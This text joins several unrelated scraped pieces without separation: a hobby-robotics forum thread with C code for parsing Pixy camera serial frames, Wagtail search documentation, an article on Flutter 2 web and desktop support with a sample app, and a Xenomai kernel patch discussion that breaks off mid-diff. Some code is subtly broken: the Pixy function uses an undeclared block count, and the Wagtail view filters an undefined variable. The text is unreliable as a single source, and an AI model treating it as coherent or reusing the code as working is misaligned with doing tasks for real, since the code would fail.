#define blks 16        // make this pynumblks + 2

fdserial *pixy;
int abc;
int signum = 1;        // this is the signature of interest (1 - 7)
int pyk;
//int pynumblks = 14;
//int blks = pynumblks + 2;
int pycktot;
int pyflg;             // pyflg = 1 when first sync word located
int pv[blks][7];
int pyxflg = 0;
int pixyx = -1;
int pyflg2 = 1;
int pycount = 200;     // number of tries or return -1  *** calling program sets this just before calling function
int rempycount;

int getpyx(int z, int cntr)  // z is the signature number 1 - 7, cntr is pycount
{
  char c1;   // raw LS byte values from pixy
  int i;
  int j;     // number of pixy words
  int k;

  // fdserial * fdserial_open(int rxpin, int txpin, int mode, int baudrate)
  // in calling program choose one of the 2 statements below, comment out the other one
  // pixy = fdserial_open(1, 0, 0, pybaud);    // For ActivityBot
  // pixy = fdserial_open(13, 14, 0, pybaud);  // for quickstart board

  pixyx = -1;
  pyflg2 = 1;
  pause(50);

  while(pyflg2)
  {
    cntr--;
    pyflg = 0;
    fdserial_rxFlush(pixy);
    c1 = fdserial_rxChar(pixy);
    if(c1 == 0x55)                                   // 1st
    {
      pv[0][0] = fdserial_rxChar(pixy);
      if(pv[0][0] == 0xAA)                           // one sync word  2nd
      {
        pyflg = 1;
        c1 = fdserial_rxChar(pixy);
        if(c1 == 0x55)                               // 3rd
        {
          pv[0][0] = fdserial_rxChar(pixy);
          if(pv[0][0] == 0xAA)                       // 2 sync words = start of frame  4th
          {
            pv[0][0] = 0xAA55;
            pyflg = 2;
            for(i = 1; i < 7; i++)
            {
              c1 = fdserial_rxChar(pixy);
              pv[0][i] = (fdserial_rxChar(pixy) << 8) | c1;
            }
            k = 1;
            for(j = 1; j < pynumblks; j++)           // aa
            {
              for(i = 0; i < 7; i++)                 // bb
              {
                c1 = fdserial_rxChar(pixy);
                pv[j][i] = (fdserial_rxChar(pixy) << 8) | c1;
                if((pv[j][1] != 0xAA55) && (pv[j][2] != 0))
                  k = j + 1;                         // 2 sync words or empty block
              }                                      // end bb
            }                                        // end aa
            printi(" \n----- new frame -----\n");
            for(i = 0; i < k; i++)                   // cc  k = num good blocks
            {
              pycktot = 0;
              for(j = 2; j < 7; j++)
                pycktot += pv[i][j];                 // calc chksum
              if((pv[i][1] != 0) && pycktot == pv[i][1])  // if cksum is good and chksum<>0  5th
              {
                pyk = k;
                printi(" --- new block ---  k = %d  i = %d \n", k, i);
                printi(" checksum good\n");
                printi("sync = %d\n", pv[i][0]);
                printi("chksum = %d\n", pv[i][1]);
                printi("sig_num = %d\n", pv[i][2]);
                printi("x = %d\n", pv[i][3]);
                printi("y = %d\n", pv[i][4]);
                printi("width = %d\n", pv[i][5]);
                printi("height = %d\n", pv[i][6]);
                printi("area = %d\n", pv[i][5]*pv[i][6]);
                if((pv[i][2] == z) && (pyxflg == 0)) // dd
                {
                  pyxflg = 1;
                  pixyx = pv[i][3];
                  pyflg2 = 0;
                  printi("pixyx = %d\n", pixyx);
                }                                    // end dd
              }                                      // end 5th
              else
                printi("*** cksum ng *** = %d\n", pycktot);
            }                                        // end cc
            pyxflg = 0;
            rempycount = cntr;   // only if there is need to know value of cntr ****
            return pixyx;
          }  // end 4th
        }  // end 3rd
      }  // end 2nd
    }  // end 1st
    if(cntr < 0)
    {
      pyflg2 = 0;
      rempycount = cntr;         // only if there is need to know value of cntr ****
      return pixyx;
    }
  }  // end while
}  // end function

int main()
// calling program must have the statements marked with ****
// Those with ^^^ are needed with each call
// calling program should call one additional time if result is -1 due to inconsistent pixy
{
  pixy = fdserial_open(1, 0, 0, pybaud);  // For ActivityBot ****
  pause(50);                              // **** needed after open
  fdserial_rxFlush(pixy);
  pause(50);
  while (1)
  {
    int xx = getchar();  // enter sig number
    signum = xx - 48;
    if((signum >= 1) && (signum <= 7))
    {
      printi("\n signum = %d  xx = %c ", signum, xx);
      fdserial_rxFlush(pixy);            // *** flush before calling
      abc = getpyx(signum, pycount);     // parameters: signum, number of tries  *** function call
      printi("signum = %d  k = %d  pycount = %d  abc = %d\n", signum, pyk, rempycount, abc);
      // pause(1000);
    }
  }
  //pause(1000);
  fdserial_close(pixy);
}
```

imbinary wrote:
» I'm working on a simple robot project with the activity board and pixyCMU5. I modified the arduino code to work with this board via SPI. The initial release is here. I run the code in a cog and access the data from the blocks struct. One gotcha I encountered was not having enough light when testing, and not detecting anything, so I assumed the code was broken :frown:. ... Hopefully this helps someone else get started. imbinary

```c
void main()
{
  pixyStart();
  // pixy_cog = cog_run(&pixyStart, 160);
  while(1)
  {
    pause(500);
    printi("running \n");
    if(blockCount){
      //dprinti(xbee,"pixy: %d\n",blocks[0].x);
      printi("pixy: count %d x(%d) y(%d)\n", blockCount, blocks[0].x, blocks[0].y);
    }
  }
}
```

```
pixyval := SPI.SHIFTIN(DQ, CLK, SPI#MSBPRE, 8)   '' read the pixy
```

The function can be modified to return any of the Pixy data (x, y, horizontal size, vertical size). The code I've posted below has the function and a short main() to demonstrate how it works. In the ActivityBot post, I've removed the printing portion of the code since it's not needed. I'd like to figure out a way to improve this since there is an issue.
Pixy sends data continuously, and the number of blocks per frame depends on the baud rate as well as the number of objects Pixy finds in each signature. The data is sent in signature-number order, with the data in each signature group sent in order of size. A new frame is started every 20 ms, even if in the middle of a block (giving a bad checksum). If there are a lot of objects (blocks) of the low-numbered signatures, the higher-signature ones may never be sent. On the other hand, if there are only a few blocks in the field of view, lots of zeros will be sent. The code below is my try. Comments welcome. Tom

@imbinary I tried the code but I did not get anything printed out. I retried by running the pixyStart() function in the same cog as main, and it did print "pixy init" and "pixy init finish", but nothing else. I added a statement in the getWord() function to print w. When I ran that code using Run With Terminal, it did print out the Pixy data block. But it would only print one block per frame. For example, I defined 3 colors (signatures 1, 2, 3). But the program only captures one block (the largest object of the lowest-numbered signature) each frame. If I removed object 1, it would print out data for object 2, etc. The main() function I used is shown below. I have 2 questions: 1. Any idea why I do not get anything printed from main? 2. Do you only get one block per frame? Thanks, Tom

The numbers looked correct, but even with the clock delay value = 1 (I tried different settings), I was only able to get one block per frame. I also had to increase the PST baud to 19200 in order to print the entire block. I'm not sure if I am doing something wrong or if that is the limitation of the Prop or of Pixy. Pixy is supposed to send data at 1 Mbit/second with 20 ms between frames. Tom

By setting the delay value to 15 (= clock delay of 1 µs) I was able to get more than 6 blocks per frame.
(6 objects were detected and the remaining values were zeros until the next frame started, indicating that it could have handled more blocks.) I tried the same thing with the C program, but was only able to get 2 blocks before the start of a new frame. That could be due to the clock setting, but I don't see any way to change it. Tom

Using that code I get over 14 blocks of data per frame, which should be sufficient for using ColorCodes or a large number of color signatures. It's at the end of this thread. You still have to write code to transform the raw data as you want. Tom

Inspired by Tom, I took his program using Pixy with the analog output signal as a starting point. I expanded it / added things:
- A 2nd cog is used to do PING
- I use a PID algorithm to get to the object (for the time being I disabled the Integral part since that can get out of hand easily and is overkill for a relatively simple task such as this one)

The code is here: Pixy_only.c Enjoy! Next step for me is to do sort of the same, but using the UART mode and the block data coming out of Pixy.

I'm wondering if anyone is still following this thread, since there hasn't been any activity for quite some time? Has this information moved to another Parallax forum thread?

There are a few Propeller threads on the Pixy Software Forum, but not too much. I've been doing some work with the Pixy, and yes, in UART mode the data stream is filled with $00 between Image Frames. Since the frame rate is 50 Hz (every 20 ms), the faster the baud rate, the more $00 bytes will be sent between frames, because the actual Image Frame data takes less of the 20 ms window. If you look in the Pixy Software Forum and search for "UART frame" you will find a special version of Pixy firmware that does not do this. It will just send the data for the Image Frame and stop. However, there are a couple of data changes: every Image Frame in the special version starts with $0000, then the sync bytes, then the data, etc.
If there are no objects in the frame it only sends the $0000. It's not obvious to me what will happen to this version if a new "standard" version of firmware is released. It would probably be a better idea for me to move to the I2C or SPI interface since, as far as I know, those protocols don't have this issue. Anyway, if you're out there and still interested in Pixy on the Propeller, either let me know where this topic has moved to, or please start posting here again, and I'll join in. Robert

Dave Prospero: Robot Farmer

After I wrote post 37 above, I got involved writing an SPI library using the C and PASM code for a few of the SPI devices I have. Then I got sidetracked. I also saw that the CMU Pixy folks have changed the SPI protocol that Pixy uses. Previously, Pixy just continuously sent data in 8-bit bytes. The new version of the Pixy firmware requires the controlling micro to send 16 bits, and Pixy responds with 16 bits. (At least that's the way I read their documentation.) That has an advantage in that when it sends, it sends a complete MSB-first data word. So there is no longer the need to test the received byte to determine if it is the 1st or 2nd byte of a word. But it will slow down the data rates. My SPI library should be able to handle that, but the original Pixy SPI code I wrote won't work on the new firmware. I haven't updated my Pixy firmware yet since there are a lot of questions regarding bugs in the software. I'm not sure if the bugs are just in the Arduino libraries or if there are issues in the firmware also. It also seems like there are some unofficial versions of firmware (like the UART code you mentioned), so I'm hesitant to write my SPI code for version "???". I'm also not sure if the slowdown will significantly reduce the number of blocks of data per frame.
One other advantage of the new SPI protocol when used with colorcodes and colorcode mode 2 (colorcodes only) is that all you would have to do is a 16-bit read and look for $AA55, and that would mean the start of a new frame, since colorcode blocks start with $AA56. That way I could do away with the code that looks for $AA followed by $55 to determine the start of a word, and with the code that looks for 2 instances of $AA55 for the start of a new frame. Tom

Glad to hear there is still interest out there. I'll keep you posted on my progress. Thanks!! Robert
http://forums.parallax.com/discussion/comment/1450432
Note: Before the autocomplete() method was introduced, the search method also did partial matching. This behaviour will be deprecated and you should either switch to the new autocomplete() method or pass partial_match=False into the search method to opt in to the new behaviour. The partial matching in search() will be completely removed in a future release.

Autocomplete searches

Wagtail provides a separate method which performs partial matching on specific autocomplete fields. This is useful for suggesting pages to the user in real-time as they type their query.

```
>>> EventPage.objects.live().autocomplete("Eve")
[<EventPage: Event 1>, <EventPage: Event 2>]
```

Tip: This method should only be used for real-time autocomplete; actual search requests should always use the search() method.

Phrase searching

Phrase searching is used for finding a whole sentence or phrase rather than individual terms. The terms must appear together and in the same order. For example:

```
>>> from wagtail.search.query import Phrase
>>> Page.objects.search(Phrase("Hello world"))
[<Page: Hello World>]

>>> Page.objects.search(Phrase("World hello"))
[<Page: World Hello day>]
```

If you are looking to implement phrase queries using the double-quote syntax, see Query string parsing.

Complex search queries

Through the use of search query classes, Wagtail also supports building search queries as Python objects which can be wrapped by and combined with other search queries. The following classes are available:

PlainText(query_string, operator=None, boost=1.0)

This class wraps a string of separate terms. This is the same as searching without query classes. It takes a query string, operator and boost. For example:

```
>>> from wagtail.search.query import PlainText
>>> Page.objects.search(PlainText("Hello world"))

# Multiple plain text queries can be combined.
# This example will match both "Hello world" and "Hello earth"
>>> Page.objects.search(PlainText("Hello") & (PlainText("world") | PlainText("earth")))
```

Phrase(query_string)

This class wraps a string containing a phrase. See the previous section for how this works. For example:

```
# This example will match both the phrases "Hello world" and "Hello earth"
>>> Page.objects.search(Phrase("Hello world") | Phrase("Hello earth"))
```

Boost(query, boost)

This class boosts the score of another query. For example:

```
>>> from wagtail.search.query import PlainText, Boost

# This example will match both the phrases "Hello world" and "Hello earth",
# but matches for "Hello world" will be ranked higher
>>> Page.objects.search(Boost(Phrase("Hello world"), 10.0) | Phrase("Hello earth"))
```

Note that this isn't supported by the PostgreSQL or database search backends.

Query string parsing

The previous sections show how to construct a phrase search query manually, but a lot of search engines (Wagtail admin included, try it!) support writing phrase queries by wrapping the phrase with double quotes. In addition to phrases, you might also want to allow users to add filters into the query using the colon syntax (hello world published:yes). These two features can be implemented using the parse_query_string utility function. This function takes a query string that a user typed and returns a query object and a dictionary of filters. For example:

```
>>> from wagtail.search.utils import parse_query_string
>>> filters, query = parse_query_string('my query string "this is a phrase" this-is-a:filter', operator='and')
>>> filters
{
    'this-is-a': 'filter',
}
>>> query
And([
    PlainText("my query string", operator='and'),
    Phrase("this is a phrase"),
])
```

Here's an example of how this function can be used in a search view:

```python
from wagtail.search.utils import parse_query_string

def search(request):
    query_string = request.GET['query']

    # Parse query
    filters, query = parse_query_string(query_string, operator='and')

    # Published filter
    # An example filter that accepts either `published:yes` or `published:no`
    # and filters the pages accordingly
    published_filter = filters.get('published')
    published_filter = published_filter and published_filter.lower()
    if published_filter in ['yes', 'true']:
        pages = pages.filter(live=True)
    elif published_filter in ['no', 'false']:
        pages = pages.filter(live=False)

    # Search
    pages = pages.search(query)

    return render(request, 'search_results.html', {'pages': pages})
```
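As an aside, the double-quote and colon syntax described above is easy to picture with a small self-contained parser. The following is a simplified sketch of the kind of splitting parse_query_string performs, not Wagtail's actual implementation (which also builds query objects and handles operators):

```python
import re

def parse_query(query_string):
    """Split a query into (filters, phrases, plain terms).

    Simplified illustration: `key:value` tokens become filters,
    double-quoted spans become phrases, the rest are plain terms.
    """
    filters = {}
    # Pull out quoted phrases first, then remove them from the string
    phrases = re.findall(r'"([^"]*)"', query_string)
    remainder = re.sub(r'"[^"]*"', ' ', query_string)
    terms = []
    for token in remainder.split():
        if ':' in token:
            key, _, value = token.partition(':')
            filters[key] = value
        else:
            terms.append(token)
    return filters, phrases, terms

filters, phrases, terms = parse_query('my query "this is a phrase" published:yes')
print(filters)   # {'published': 'yes'}
print(phrases)   # ['this is a phrase']
print(terms)     # ['my', 'query']
```

The real utility returns the remaining terms and phrases combined into a single query object, but the tokenization idea is the same.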
https://docs.wagtail.org/en/v2.15.1/topics/search/searching.html
Last year, I wrote two articles here on Smashing Magazine about using Flutter on web and desktop platforms. The first article was a general introduction to web and desktop development, and focused on building responsive UI; the second article was about the challenges you might face when trying to develop a Flutter app that runs on multiple platforms. Back then, Flutter support for non-mobile platforms wasn’t considered stable and production-ready by the Flutter team, but things have changed now.

Flutter 2 Is Here

On the 3rd of March, Google held the Flutter Engage event, where Flutter 2.0 was launched. This release is really a proper 2.0 release, with many changes promising to make Flutter really ready for going beyond mobile app development. The change that is central to understanding why Flutter 2.0 matters is that web development is now officially part of the stable channel, and desktop support will follow soon on the stable channel as well. In fact, it is currently enabled in release candidate-like form as an early release beta snapshot in the stable channel. In the announcement, Google didn’t just give a hint of what the future of Flutter will be like. There were also actual examples of how large companies are already working on Flutter apps to replace their existing apps with ones that perform better and allow developers to be more productive. For example, the world’s biggest car manufacturer, Toyota, will now be building the infotainment system on their cars using Flutter. Another interesting announcement — this one showing how fast Flutter is improving as a cross-platform SDK — is Canonical’s announcement that, in addition to developing their new Ubuntu installer using Flutter, they will also be using Flutter as their default option to build desktop apps.
They also released a Flutter version of Ubuntu’s Yaru theme, which we will use later in the article to build a Flutter desktop app that looks perfectly at home in the Ubuntu desktop, also using some more of the new Flutter features. You can take a look at Google’s Flutter 2 announcement to get a more complete picture. Let’s look at some of the technical changes to Flutter which got onto the stable channel with version 2.0 and build a very simple example desktop app with Flutter before we draw some conclusions on what specific project types we could and couldn’t use Flutter for as of now.

General Usability Changes For Bigger Devices

According to the announcement, many changes have been made to Flutter to provide better support for devices that aren’t mobile devices. An obvious example of something that was needed for web and desktop apps, and until now had to be done using third-party packages or by implementing it yourself, is a scrollbar. Now there is a built-in Scrollbar which can fit right into your app, looking exactly how a scrollbar should look on the specific platform: with or without a track, with the possibility of scrolling by clicking on the track, for example, which is huge if you want your users to feel right at home from the start when using your Flutter app. You can also theme and customize it. It also looks like at some point Flutter will automatically show suitable scrollbars when the content of the app is scrollable. Meanwhile, you can just wrap any scrollable view with the scrollbar widget of your choice and create a ScrollController to add as the controller for both the scrollbar and the scrollable widget (in case you’ve never used a ScrollController, you use it exactly like a TextEditingController for a TextField). You can see an example of the use of a regular Material scrollbar a bit further down this article in the desktop app example.
Flutter Web Changes

Flutter for the web was already in quite a usable form, but there were performance and usability issues which meant it never felt as polished as mobile Flutter. With the release of Flutter 2.0, there have been many improvements to it, especially when it comes to performance. The compilation target based on WebAssembly and Skia, previously very experimental and tricky to use to render your app, is now called CanvasKit. It’s been refined to offer a consistent and performant experience when going from running a Flutter app natively on mobile devices to running it in a browser. Now, by default, your app will render using CanvasKit for desktop web users and with the default HTML renderer (which has had improvements as well, but is not as good as CanvasKit) for mobile web users. If you’ve tried to use Flutter to build web apps, you might have noticed it wasn’t particularly intuitive to have something as simple as a hyperlink. Now, at least, you can create hyperlinks a bit more like you would when using HTML, using the Link class. This is actually not an addition to Flutter itself, but a recent addition to Google’s url_launcher package. You can find a complete description and examples of usage of the Link class in the official API reference. Text selection was improved, as now the pivot point corresponds to where the user started selecting text and not the left edge of the SelectableText in question. Also, Copy/Cut/Paste options now exist and work properly. Nevertheless, text selection still isn’t top-notch, as it’s not possible to select text across different SelectableText widgets and selectable text still isn’t the default, but we will talk about this as well as other outstanding Flutter web drawbacks (lack of SEO support, first and foremost) in the conclusion to this article.
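Based on the url_launcher API reference, a Link wraps a URI and a builder that receives a followLink callback to wire into any tappable widget; a minimal sketch (the button around it is illustrative) looks like this:

```dart
import 'package:flutter/material.dart';
import 'package:url_launcher/link.dart';

// Illustrative sketch: a button that behaves like a real hyperlink,
// including open-in-new-tab semantics on the web.
class DocsLink extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return Link(
      uri: Uri.parse('https://flutter.dev'),
      target: LinkTarget.blank, // open in a new tab on the web
      builder: (context, followLink) => TextButton(
        onPressed: followLink,
        child: Text('Flutter documentation'),
      ),
    );
  }
}
```

On the web this renders an actual anchor under the hood, so right-click and middle-click behave as users expect; on mobile it falls back to launching the URL.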
Flutter Desktop Changes

When I wrote about web and desktop development with Flutter last year, I focused mostly on building web apps with Flutter, given that desktop development was still considered very experimental (not even on the beta channel). Now, though, Flutter desktop support is soon to follow web support and will be going stable. Performance and stability have been improved quite a lot, and the improvements in general usability for bigger devices operated with a mouse and keyboard that benefit web apps so much also mean that Flutter desktop apps are now more usable. There is still a lack of tooling for desktop apps and there are still many quite severe outstanding bugs, so don’t try to use it for your next desktop app project meant for public distribution.

Example Desktop App Built With Flutter

Flutter desktop support is now quite stable and usable, though, and it will surely get better in the future just as much as Flutter in its entirety has gotten better until now, so let’s give it a try to see it in action! You can download the entire code example on a GitHub repo. The app we will build is a very simple one: we have sidebar navigation along with some content items for each of the navigation sections. The first thing to do is figure out your dependencies. First of all, you must have Flutter desktop development enabled, using the command flutter config --enable-${OS_NAME}-desktop, where you’d replace ${OS_NAME} with your desktop OS of choice, either windows, linux or macos. For this example, I’ll use Linux, given that we’re going to use the Ubuntu theme. There are also other dependencies needed to build native apps for each platform: for example, on Windows you need Visual Studio 2019, on macOS you need Xcode and CocoaPods, and you can find an up-to-date list of Linux dependencies on Flutter’s official website.
Then create a Flutter project by running:

```
flutter create flutter_ubuntu_desktop_example
```

Then, we must get the theme itself (our app’s only dependency) by adding yaru to your app’s dependencies in pubspec.yaml (in the root of the source tree):

```yaml
dependencies:
  yaru: ^0.0.0-dev.8
  flutter:
    sdk: flutter
```

Then, let’s move over to lib/main.dart, where our app’s code resides. First, we import the stuff we need. In this case, we’re just going to import the regular Flutter Material Design library and the Yaru theme (we are only going to use the light theme for this example, so we are only going to show that one object in the Yaru package):

```dart
import 'package:flutter/material.dart';
import 'package:yaru/yaru.dart' show yaruLightTheme;
```

Instead of having a separate app class, we are going to call the MaterialApp constructor directly in main when calling runApp, so that’s where we set the app’s theme, which is going to be the Yaru theme, more specifically the light theme called yaruLightTheme:

```dart
void main() => runApp(MaterialApp(
      theme: yaruLightTheme,
      home: HomePage(),
    ));
```

The HomePage is going to be a StatefulWidget, holding the data we are going to show given that it’s immutable (remember, widgets are always immutable; mutability is handled in the State of a StatefulWidget):

```dart
class HomePage extends StatefulWidget {
  final dataToShow = {
    "First example data": [
      "First string in first list item",
      "Second in first",
      "Example",
      "One"
    ],
    "Second example": [
      "This is another example",
      "Check",
      "It",
      "Out",
      "Here's other data"
    ],
    "Third example": [
      "Flutter is", "really", "awesome", "and", "it", "now", "works",
      "everywhere,", "this", "is", "incredible", "and", "everyone",
      "should", "know", "about", "it", "because", "someone", "must",
      "be", "missing", "out", "on", "a lot"
    ]
  }.entries.toList();

  @override
  createState() => HomePageState();
}
```

The HomePageState is where we define the app UI and behaviour.
First of all, let's look at the tree of widgets we want to build (list and grid items and spacing widgets excluded): we are going to restrict the Column on the left (the one showing the controls for the widgets to show on the right side of the app) to a certain width (400 pixels, for example) using a Container, whereas the GridView on the right should be Expanded to fill the view. On the left side of the Row (within the Column), the ListView should expand to fill the vertical space below the Row of buttons at the top. Within the Row at the top, we also need to expand the TextButton (the reset button) to fill the space to the right of the left and right chevron IconButtons. The resulting HomePageState that does all of that, along with the necessary logic to show the right stuff on the right depending on what the user selects on the left, is the following:

class HomePageState extends State<HomePage> {
  int selected = 0;

  final ScrollController _gridScrollController = ScrollController();

  incrementSelected() {
    if (selected != widget.dataToShow.length - 1) {
      setState(() {
        selected++;
      });
    }
  }

  decrementSelected() {
    if (selected != 0) {
      setState(() {
        selected--;
      });
    }
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      body: Row(
        children: [
          Container(
            width: 400.0,
            child: Column(
              children: [
                Row(
                  children: [
                    IconButton(
                      icon: Icon(Icons.chevron_left),
                      onPressed: decrementSelected,
                    ),
                    Expanded(
                      child: TextButton(
                        child: Text("Reset"),
                        onPressed: () {
                          setState(() {
                            selected = 0;
                          });
                        },
                      ),
                    ),
                    IconButton(
                      icon: Icon(Icons.chevron_right),
                      onPressed: incrementSelected,
                    ),
                  ],
                ),
                Expanded(
                  child: ListView.builder(
                    itemCount: widget.dataToShow.length,
                    itemBuilder: (_, i) => ListTile(
                      title: Text(widget.dataToShow[i].key),
                      leading: i == selected
                          ? Icon(Icons.check)
                          : Icon(Icons.not_interested),
                      onTap: () {
                        setState(() {
                          selected = i;
                        });
                      },
                    ),
                  ),
                ),
              ],
            ),
          ),
          Expanded(
            child: Scrollbar(
              isAlwaysShown: true,
              controller: _gridScrollController,
              child: GridView.builder(
                controller: _gridScrollController,
                itemCount: widget.dataToShow[selected].value.length,
                gridDelegate: SliverGridDelegateWithMaxCrossAxisExtent(
                    maxCrossAxisExtent: 200.0),
                itemBuilder: (_, i) => Container(
                  width: 200.0,
                  height: 200.0,
                  child: Padding(
                    padding: const EdgeInsets.all(8.0),
                    child: Card(
                      child: Center(
                          child: Text(widget.dataToShow[selected].value[i])),
                    ),
                  ),
                ),
              ),
            ),
          ),
        ],
      ),
    );
  }
}

and we're done! Then you build your app with

flutter build ${OS_NAME}

where ${OS_NAME} is the name of your OS, the same one you used earlier to enable Flutter desktop development using flutter config. The compiled binary to run your app will be build/linux/x64/release/bundle/flutter_ubuntu_desktop_example on Linux and build\windows\runner\Release\flutter_ubuntu_desktop_example.exe on Windows; you can run that and you'll get the app that I showed you at the start of this section. On macOS, you need to open macos/Runner.xcworkspace in Xcode and then use Xcode to build and run your app.

Other Flutter Changes

There have also been a few changes that affect mobile development with Flutter; here is just a brief selection of them. A feature that many Flutter developers wanted is better support for AdMob ads, and it's now finally included in the official google_mobile_ads package. Another one is autocomplete: there is an Autocomplete Material widget for it, as well as a more customizable RawAutocomplete widget. The addition of the Link widget that we discussed in the section about web development actually applies to all platforms, even though its effects will be felt most by those working on Flutter web projects.

Recent Dart Language Changes

It is important to be aware of the changes that were made to the Dart language that affect Flutter app development.
In particular, Dart 2.12 brought C language interoperability support (described in detail and with instructions for different platforms on the official Flutter website); also, sound null-safety was added to the stable Dart release channel.

null-safety

The biggest change that was made to Dart is the introduction of sound null-safety, which is getting more and more support from third-party packages as well as the Google-developed libraries and packages. Null safety brings compiler optimizations and reduces the chance of runtime errors, so, even though supporting it is optional right now, it is important that you at least start understanding how to make your app null-safe. At the moment, though, that may not be an option for you, as not all Pub packages are fully null-safe; if you need one of those packages for your app, you won't be able to take advantage of the benefits of null-safety.

Making Your App null-safe

If you've ever worked with Kotlin, Dart's approach to null safety will be somewhat familiar to you. Take a look at Dart's official guide for a more complete treatment of null-safety.

All of the types you're familiar with (String, int, Object, List, your own classes, etc.) are now non-nullable: their value can never be null. This means that a function that has a non-nullable return type must always return a value, or else you'll get a compilation error. It also means you always have to initialize non-nullable variables, unless it's a local variable that gets assigned a value before it's ever used. If you want a variable to be nullable, you add a question mark to the end of the type name, e.g. when declaring an integer like this:

int? a = 1;

At any point, you can set it to null and the compiler won't cry about it. Now, what if you have a nullable value and use it for something that requires a non-nullable value? To do that, you can simply check that it isn't null:

void function(int?
a) {
  if (a != null) {
    // a is an int here
  }
}

If you know with 100% certainty that a variable exists and isn't null, you can just use the ! operator, like this:

String unSafeCode(String? s) => s!;

Drawing Conclusions: What Can We Do With Flutter 2?

As Flutter keeps evolving, there are more and more things we can do with it, but it's still not reasonable to say that Flutter can be used for any app development project of any kind. On the mobile side, it's unlikely you're going to run into something that Flutter isn't great at, because it's been supported since the start and it's been polished. Most things you'll ever need are already there.

On the other hand, web and desktop aren't quite there yet. Desktop is still a bit buggy, and Windows apps (which are an important part of desktop development) still require a lot of work before they look good. The situation is better on Linux and macOS, but only to an extent.

The web is in a much better place than desktop. You can build decent web apps, but you're still mostly limited to single-page applications and Progressive Web Apps. We still most certainly don't want to use it for content-centric apps where indexability and SEO are needed; content-centric apps probably will not be that great anyway, because text selection still isn't top-notch, as we've seen in the section about the current state of Flutter for the web. If you need the web version of your Flutter app, though, Flutter for the web will probably be just fine, especially as there is a huge number of web-compatible packages around already and the list is always growing.

Additional Resources
https://www.fvwebsite.design/fraser-valley-website-design/whats-new-in-flutter-2-smashing-magazine/
On Sun, 2009-10-18 at 19:56 +0200, Jan Kiszka wrote: > Philippe Gerum wrote: > > On Sun, 2009-10-18 at 14:54 +0200, Jan Kiszka wrote: > >> Philippe Gerum wrote: > >>> On Fri, 2009-10-16 at 19:08 +0200, Jan Kiszka wrote: > >>>> Hi, > >>>> > >>>> our automatic object cleanup on process termination is "slightly" broken > >>>> for the native skin. The inline and macro magic behind > >>>> __native_*_flush_rq() blindly calls rt_*_delete(), but that's not > >>>> correct for mutexes (we can leak memory and/or corrupt the system heap), > >>>> queues and heaps (we may leak shared heaps). > >>> Please elaborate regarding both queues and heaps (scenario). > >> Master creates heap, slave binds to it, master wants to terminate (or is > >> killed, doesn't matter), heap cannot be released as the slave is still > >> bound to it, slave terminates but heap object is still reserved on the > >> main heap => memory leak (just confirmed with a test case). > > > > This fixes it: > > > > diff --git a/ksrc/skins/native/heap.c b/ksrc/skins/native/heap.c > > index 0a24735..0fcb3c2 100644 > > --- a/ksrc/skins/native/heap.c > > +++ b/ksrc/skins/native/heap.c > > @@ -340,6 +340,11 @@ static void __heap_post_release(struct xnheap *h) > > xnpod_schedule(); > > > > + xeno_mark_deleted(heap); > Actually, we need more than this: diff --git a/ksrc/skins/native/heap.c b/ksrc/skins/native/heap.c index 0a24735..5d43fa7 100644 --- a/ksrc/skins/native/heap.c +++ b/ksrc/skins/native/heap.c @@ -323,6 +323,7 @@ int rt_heap_create(RT_HEAP *heap, const char *name, size_t heapsize, int mode) static void __heap_post_release(struct xnheap *h) { RT_HEAP *heap = container_of(h, RT_HEAP, heap_base); + int resched; spl_t s; xnlock_get_irqsave(&nklock, s); @@ -332,14 +333,24 @@ static void __heap_post_release(struct xnheap *h) if (heap->handle) xnregistry_remove(heap->handle); - if (xnsynch_destroy(&heap->synch_base) == XNSYNCH_RESCHED) + xeno_mark_deleted(heap); + + resched = xnsynch_destroy(&heap->synch_base); + + 
xnlock_put_irqrestore(&nklock, s); + +#ifdef CONFIG_XENO_OPT_PERVASIVE + if (heap->cpid) { + heap->cpid = 0; + xnfree(heap); + } +#endif + if (resched) /* * Some task has been woken up as a result of the * deletion: reschedule now. */ xnpod_schedule(); - - xnlock_put_irqrestore(&nklock, s); } /** @@ -404,7 +415,7 @@ int rt_heap_delete_inner(RT_HEAP *heap, void __user *mapaddr) /* * The heap descriptor has been marked as deleted before we - * released the superlock thus preventing any sucessful + * released the superlock thus preventing any successful * subsequent calls of rt_heap_delete(), so now we can * actually destroy it safely. */ diff --git a/ksrc/skins/native/queue.c b/ksrc/skins/native/queue.c index 527bde8..35e292b 100644 --- a/ksrc/skins/native/queue.c +++ b/ksrc/skins/native/queue.c @@ -286,6 +286,7 @@ int rt_queue_create(RT_QUEUE *q, static void __queue_post_release(struct xnheap *heap) { RT_QUEUE *q = container_of(heap, RT_QUEUE, bufpool); + int resched; spl_t s; xnlock_get_irqsave(&nklock, s); @@ -295,14 +296,24 @@ static void __queue_post_release(struct xnheap *heap) if (q->handle) xnregistry_remove(q->handle); - if (xnsynch_destroy(&q->synch_base) == XNSYNCH_RESCHED) + xeno_mark_deleted(q); + + resched = xnsynch_destroy(&q->synch_base); + + xnlock_put_irqrestore(&nklock, s); + +#ifdef CONFIG_XENO_OPT_PERVASIVE + if (q->cpid) { + q->cpid = 0; + xnfree(q); + } +#endif + if (resched) /* - * Some task has been woken up as a result of - * the deletion: reschedule now. + * Some task has been woken up as a result of the + * deletion: reschedule now. 
